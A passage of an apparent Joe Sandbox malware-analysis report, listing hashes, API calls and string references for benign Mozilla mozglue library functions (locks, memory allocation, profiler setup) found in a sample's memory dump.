LeaveCriticalSection.KERNEL32(6665F770,?,?,?,?,?,?,?,?,665FBF9F), ref: 6663AB6B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: ab91db301c308a664803675aabd014e396b97ef0f671e487bbb3c32340a02ec8
Instruction ID: 2c9429399238e011ad1f5a17ed749a88c36f3e036922176ef7c56ee28414fc92
Opcode Fuzzy Hash: ab91db301c308a664803675aabd014e396b97ef0f671e487bbb3c32340a02ec8
Instruction Fuzzy Hash: FC1160B1A002698FCF04DFA9F88589B7BB6FF893557040029E545A7301E730E909CBA1

Function 665EB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 665EB4F5
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 665EB502
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 665EB542
free.MOZGLUE(?), ref: 665EB578

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 4e60c9462368ce1691bf48785aa254e7ddfd57dddbb92de8e7d92115dbe0c02d
Instruction ID: e8d8719f7a9e2b6d31964a1e7feea27df8767314d2f320f90b01dae8b03fe70b
Opcode Fuzzy Hash: 4e60c9462368ce1691bf48785aa254e7ddfd57dddbb92de8e7d92115dbe0c02d
Instruction Fuzzy Hash: 2511DF30D10B51C7DB12DF29EA02766B3B2FFE6316F10970AE94953602FBB0A5C18B90

Function 66613DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,665DF20E,?), ref: 66613DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(665DF20E,00000000,?), ref: 66613DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 66613E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 66613E0E

Part of subcall function 6660CC00: GetCurrentProcess.KERNEL32(?,?,665D31A7), ref: 6660CC0D
Part of subcall function 6660CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,665D31A7), ref: 6660CC16

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 5214da0383708c1cf09e5a1b0737375d2b255fd9d75ca96913c31348cf0330a6
Instruction ID: 29a5d58122dd822da73d25fe0b23ff58673cb62993265e5f70afbabdf444cac2
Opcode Fuzzy Hash: 5214da0383708c1cf09e5a1b0737375d2b255fd9d75ca96913c31348cf0330a6
Instruction Fuzzy Hash: 44F082B15002187FD7009B55FC42DAB3B2EDB86624F040021FE0917300D635BE1586FB

Function 66622050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6662205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6662201B,?,?,?,?,?,?,?,66621F8F,?,?), ref: 66622064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662208E
free.MOZGLUE(?,?,?,00000000,?,6662201B,?,?,?,?,?,?,?,66621F8F,?,?), ref: 666220A3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 0c9e882c52964527c382f9da78dde442a679c96dca4d0dceefe15638b8edc3cb
Instruction ID: 3c18ef3d738fb577c57a674f46e01c37901364d27897137d28aea89f4b41556c
Opcode Fuzzy Hash: 0c9e882c52964527c382f9da78dde442a679c96dca4d0dceefe15638b8edc3cb
Instruction Fuzzy Hash: C9F0B4710007109BD711CF16E899B5BBBFEEFD6364F14011AE64687310C772A842CBD6

Function 6661EB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6661EB11
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6661EB3C
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EB5B
GetCurrentThreadId.KERNEL32 ref: 6661EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6661EBAC
GetCurrentThreadId.KERNEL32 ref: 6661EBC1
AcquireSRWLockExclusive.KERNEL32(6665F4B8,?,?,00000000), ref: 6661EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6661EBE5
ReleaseSRWLockExclusive.KERNEL32(6665F4B8,00000000), ref: 6661EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6661EC46
CloseHandle.KERNEL32(?), ref: 6661EC55
free.MOZGLUE(00000000), ref: 6661EC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6661EA9B
[I %d/%d] profiler_start, xrefs: 6661EBB4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: 87f1a61a8f6fc113aa95b7093fb5d04d420d47ab8e59d344213bff170e5416da
Instruction ID: 5008c8bce83179f585b8589acdb20641c5c02e8b41231d5bd75a9e06add95492
Opcode Fuzzy Hash: 87f1a61a8f6fc113aa95b7093fb5d04d420d47ab8e59d344213bff170e5416da
Instruction Fuzzy Hash: EEF0A7316003B09BDB01DF5BFD07B6A7B67ABC2255F004025E705D3342D7749445CB65

Function 666220B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 666220B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6660FBD1), ref: 666220C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6660FBD1), ref: 666220DA
free.MOZGLUE(00000000,?,6660FBD1), ref: 666220F1

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: c3152d2af08091248fae0d64f1064c53f46ad5864174329568c1228f5fa69296
Instruction ID: 7e2b7c6f4f857ca7a3108e71623fab3a80b938304b486714bb90e80d2820c7a4
Opcode Fuzzy Hash: c3152d2af08091248fae0d64f1064c53f46ad5864174329568c1228f5fa69296
Instruction Fuzzy Hash: 5BE0E5319006258BC7209F26E81554EBFEFEFC6314B04062AE64683200D776E9428AD5

Function 666285B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 666285D3

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 66628725

Strings

map/set<T> too long, xrefs: 66628720

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 39c876e6db2eb0c93f6dbedec4bae23b1b85883744acb210e001d27d685a43de
Instruction ID: 322a15b849fb9e74723c9f95d9b5804494424305b6c395ce324e8c56c8cadbe9
Opcode Fuzzy Hash: 39c876e6db2eb0c93f6dbedec4bae23b1b85883744acb210e001d27d685a43de
Instruction Fuzzy Hash: 92515374A10642AFD701CF19D884A5ABBE5BF5A318F18C18CD8595B362C335EC89CF92

Function 665DBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 665DBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 665DBE8F

Strings

0, xrefs: 665DBE5B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 0b0887ae9ddfee13687d4d80cbc5c0fa8c3649e456ea03fa5997f7913903dba1
Instruction ID: 7d807443e5f18a395c0478e336b67711a37783bd1e09d1b3a8c5d88b3119bf9c
Opcode Fuzzy Hash: 0b0887ae9ddfee13687d4d80cbc5c0fa8c3649e456ea03fa5997f7913903dba1
Instruction Fuzzy Hash: 1D418EB1908746CFC701EF28C482A5BBBE5EF9A344F008A1DF985A7291D731D955CB86

Function 665D9A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 665D9B2C
memcpy.VCRUNTIME140(665D99CF,00000000,?), ref: 665D9BB6
memcpy.VCRUNTIME140(?,?,?), ref: 665D9BF8
memcpy.VCRUNTIME140(?,?,?), ref: 665D9DE4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: ff010612909f41f83e10a0496d2832a1f83689390d06ca8ef6fc226a5e3d45eb
Instruction ID: 20a2388c9a74d30e3b69569e98163db8eb4860361f92adc34246724216e36cfa
Opcode Fuzzy Hash: ff010612909f41f83e10a0496d2832a1f83689390d06ca8ef6fc226a5e3d45eb
Instruction Fuzzy Hash: ADD16B71A0020A9FDB14CF69C891AAEBBF2FF88314F15852DE946A7390D731ED51CB94

Function 66620A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 665E37F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6663145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 665E380A

Part of subcall function 66618DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,666306E6,?,?,00000008,?,?,?,?,?,?,?), ref: 66618DCC

Part of subcall function 66620B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6662138F,?,?,?), ref: 66620B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6662138F,?,?,?), ref: 66620B27
free.MOZGLUE(?,?,?,?,?,6662138F,?,?,?), ref: 66620B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 66620AB5

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 1c87429aabbdc30aec791ae17092a7924c39a38b17147b802bfaae31c7046daa
Instruction ID: af64bdf22090926e8e45757c88f1a1f8175baf6780c98918e56ced58fec7fe07
Opcode Fuzzy Hash: 1c87429aabbdc30aec791ae17092a7924c39a38b17147b802bfaae31c7046daa
Instruction Fuzzy Hash: B321A174A002159BDB04DF59E8A1BBEBBBAAFC5708F50402CD9059B342DB71A941CFE1

Function 665DF180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 665DF19B

Part of subcall function 665FD850: EnterCriticalSection.KERNEL32(?), ref: 665FD904
Part of subcall function 665FD850: LeaveCriticalSection.KERNEL32(?), ref: 665FD971
Part of subcall function 665FD850: memset.VCRUNTIME140(?,00000000,?), ref: 665FD97B

mozalloc_abort.MOZGLUE(?), ref: 665DF209

Strings

d, xrefs: 665DF1F5

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: e99d4e9cdaabc3edb930ab2efa7841ce79c6a4a387f3b985046fec1d04f54815
Instruction ID: 89198147610eebc9ebf13062e79ced6efbcfd791fe4340138663445f76f7bac9
Opcode Fuzzy Hash: e99d4e9cdaabc3edb930ab2efa7841ce79c6a4a387f3b985046fec1d04f54815
Instruction Fuzzy Hash: AC113632E0468997EB04CF5DED621AEB766DFC6218B019229DD05AB251EF30AEC4C384

Function 665ECA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 665ECA26

Part of subcall function 665ECAB0: EnterCriticalSection.KERNEL32(?), ref: 665ECB49
Part of subcall function 665ECAB0: LeaveCriticalSection.KERNEL32(?), ref: 665ECBB6

mozalloc_abort.MOZGLUE(?), ref: 665ECAA2

Strings

d, xrefs: 665ECA6C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: f53f47b5a3b55d1731b8afd1df9d6652921d232690066e12e124750b24cb8202
Instruction ID: c110580041e120151bc2f960bc9d826f109dbada81ee97f1e1b3c51a813fa28d
Opcode Fuzzy Hash: f53f47b5a3b55d1731b8afd1df9d6652921d232690066e12e124750b24cb8202
Instruction Fuzzy Hash: BC11E521D0079893DF01DB6DEC124BEBB76EFD6214B459229DE55A7212FB30E9C4C380

Function 66613CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 66613D19
mozalloc_abort.MOZGLUE(?), ref: 66613D6C

Strings

d, xrefs: 66613D58

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 9efbe8d9d3bad84d2930083e089097a002a1207caa2478fb9802756240e19844
Instruction ID: ff823fbec27de442fd0b8c2b304ce9f3bac2b50e46571c8d316fd11b599abdbe
Opcode Fuzzy Hash: 9efbe8d9d3bad84d2930083e089097a002a1207caa2478fb9802756240e19844
Instruction Fuzzy Hash: DD110431D0869897DF04DF6DEC154AEFB76EFC6214B408219ED46A7202EB30A984C390

Function 665F1A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 665F1A6B

Part of subcall function 665F1AF0: EnterCriticalSection.KERNEL32(?), ref: 665F1C36

mozalloc_abort.MOZGLUE(?), ref: 665F1AE7

Strings

d, xrefs: 665F1AB1

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 960018b6db1b22c1f33a612c1d848ccfab8dc93bd808c951c2a4f33a7b622088
Instruction ID: f8e686d7d5fc10084c9e6121debfa17f85a92a0f9dbcf58e39489533e14da7f1
Opcode Fuzzy Hash: 960018b6db1b22c1f33a612c1d848ccfab8dc93bd808c951c2a4f33a7b622088
Instruction Fuzzy Hash: DA113631D1069893CF04DFA9DC024BEB7A6EFC5204F448619EE866B202EB30A9C4C780

Function 665E4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,665E44B2,6665E21C,6665F7F8), ref: 665E473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 665E474A

Strings

GetNtLoaderAPI, xrefs: 665E4744

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 1dff488f042c73e1b90fbfc69ee0853dc43b593fe660e1511311f540fd30717b
Instruction ID: 1b953b1186e756a93c19b41940aae96ea4abff59cdf2c4525cf704518fbbde6b
Opcode Fuzzy Hash: 1dff488f042c73e1b90fbfc69ee0853dc43b593fe660e1511311f540fd30717b
Instruction Fuzzy Hash: 21014C756042249FDF01EF6BA89662D7BABEBCA351B054069EB06C7300DB74D8028FD2

Function 66636DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 66636E22
__Init_thread_footer.LIBCMT ref: 66636E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 66636E1D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 7a340b0d8f9e81de453ddee0ce38e60ebb83b6a2e74185fc82fe8b5511c606ca
Instruction ID: 6068f1d21afeffcbf2329dc7d3e3c420ee98f1d7741db2202fc91f03a31e7336
Opcode Fuzzy Hash: 7a340b0d8f9e81de453ddee0ce38e60ebb83b6a2e74185fc82fe8b5511c606ca
Instruction Fuzzy Hash: 24F059718083E0CBEB01CB6BFD52A997B6357D3214F041065C505473E1CB31E526CE97

Function 665E9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 665E9EEF

Strings

NaN, xrefs: 665E9EC1
Infinity, xrefs: 665E9EB7

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 917d98a12e00b83f839bf1ecdafb4b79cf33e507217d9532464a7685544b84cf
Instruction ID: 08008ddb87bbf85b0970ebb7aca85543336ea5a042cf92b32070b340e0eb426a
Opcode Fuzzy Hash: 917d98a12e00b83f839bf1ecdafb4b79cf33e507217d9532464a7685544b84cf
Instruction Fuzzy Hash: 28F0A9B0800666CBDF00DF1AF947B643B63B7C3309F200B68C7440B281D3766552CE86

Function 665E6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kaf,?,66614B30,80000000,?,66614AB7,?,665D43CF,?,665D42D2), ref: 665E6C42

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

moz_xmalloc.MOZGLUE(0Kaf,?,66614B30,80000000,?,66614AB7,?,665D43CF,?,665D42D2), ref: 665E6C58

Strings

0Kaf, xrefs: 665E6C33, 665E6C41, 665E6C57

Memory Dump Source

